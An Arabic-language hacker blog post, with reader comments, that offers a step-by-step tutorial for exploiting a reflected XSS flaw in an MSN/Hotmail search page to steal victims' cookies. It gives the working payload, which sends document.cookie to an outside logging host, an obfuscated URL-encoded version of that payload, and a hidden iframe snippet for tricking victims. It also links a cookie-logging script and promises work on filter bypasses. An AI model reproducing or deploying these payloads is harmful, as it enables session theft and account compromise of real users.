Share

[0dAy] Hotmail XSS Vuln. Exploitation to cookies logging [عربى]

السلام عليكم

شرح ثغرة فى هوتميل من نوع

xss

حتى الحصول على الكوكيز الخاص بالضحية

الثغرة من اكتشاف الحربى

الاستغلال والشرح بواسطة فارس

كل ما ستحتاجه هو السكربت الخاص بتخزين الكوكيز

http://pastebin.com/mZCMRcGC



ملحوظه (السكربتات الاخرى لن تقوم بتخزين الكوكيز كاملا)

شرح فيديو به باقى العملية

http://www.mirrorcreator.com/files/1QHMGZI8/hotmail_xss_exploit.rar_links

نص الشرح لمن عندهم خلفية عن ثغرات ال

xss
| HaCKeR-MaN
| sec4ever.com , alm3refh.com , 7rs.cc
| personal Blog : 1337r1z.wordpress.com

السلام عليكم
نبدأ الشرح على السخان
الاول نظبط صفحة اللوجات
ع اى شل معاك حطها
بس لازم تخلى اسم الملف co.php
لو هتخليه اسم تانى غيره هنا
عشان الكوكيز يوصل مرتب مش أكتر :)
الاستغلال تبع الثغره
http://glo.msn.com/search?searchTerm="><object data="javascript:document.location='http://www.viagra-pharma.com/co.php?c='.concat(escape(document.cookie));"></script>
غير
http://www.viagra-pharma.com/co.php
باللينك تبع الملف بتاعك انت
باقى نعمل تمويه صغير بقى
<iframe id="rf" src="" allowtransparency="true" style="display:none;" scrolling="auto"  frameborder="0">
حط الكود ده فى اى اندكس تبعك
قبل وسم ال
</html>
عشان تخدع الضحيه بس
بعد كده نشفر الاستغلال من اول
لاحظ
من بعد = مباشرة
فى برنامج coder
http full
نعدل الاستغلال بحيث يكون كده
http://glo.msn.com/search?searchTerm=%22%3E%3C%6F%62%6A%65%63%74%20%64%61%74%61%3D%22%6A%61%76%61%73%63%72%69%70%74%3A%64%6F%63%75%6D%65%6E%74%2E%6C%6F%63%61%74%69%6F%6E%3D%27%68%74%74%70%3A%2F%2F%77%77%77%2E%76%69%61%67%72%61%2D%70%68%61%72%6D%61%2E%63%6F%6D%2F%63%6F%2E%70%68%70%3F%63%3D%27%2E%63%6F%6E%63%61%74%28%65%73%63%61%70%65%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%29%3B%22%3E%3C%2F%73%63%72%69%70%74%3E
نحطه بقى فى الاى فريم
فى
src=
ونحفظ الصفحه
نشوف الناتج

Greets to Karar , H311 C0D3 , Lagripe-Dz , Red virus , T3rrorist , the injector , Orange-Man , Fox-hacker , sec-mind , zaid , sa^Devil , Xss-Man , Raymon , Maestro-dz , sharp-hack and all [Eg,Ps,Dz,Ma,Sy] HaCKeRs

./faris

8 comments:

Security-Mind said...

وحش يا فارس

HaCkEr 20 said...

مبدع كمان يابو الفوارس

1r4Qi 1337 said...

اي ده يا سوبر ماآآن نايس وربي

and all [Eg,Ps,Dz,Ma,Sy] HaCKeRs

طيب فين الـiQ

^_0

Tzzr said...

Thanks for gifting

hacker-co0ol said...

Faris

My friend

we are have same old problem : MSPAuth & MSPProf is missing

so what's new in your code ???

we cant do any things without MSPAuth & MSPProf


Am i right ??

Faris said...

this cookies are for msn.com , not live.com
so it doesn't contain the full inbox cookies
u can do any thing within the msn only but not the mail account
it's just an idea + an simple tut for the xss beginners :),
nice 2 meet u

Faris said...

too many xss filters exist not only the stupid explorer one :)
but with some tricks it can be by passed , and u will say damn , it was so easy . . lol
as soon as possible i will publish an article about Bypassing the famous xss filters including IE.
./faris

hacker-co0ol said...

ok bro ll be waiting for you .... have good day

Post a Comment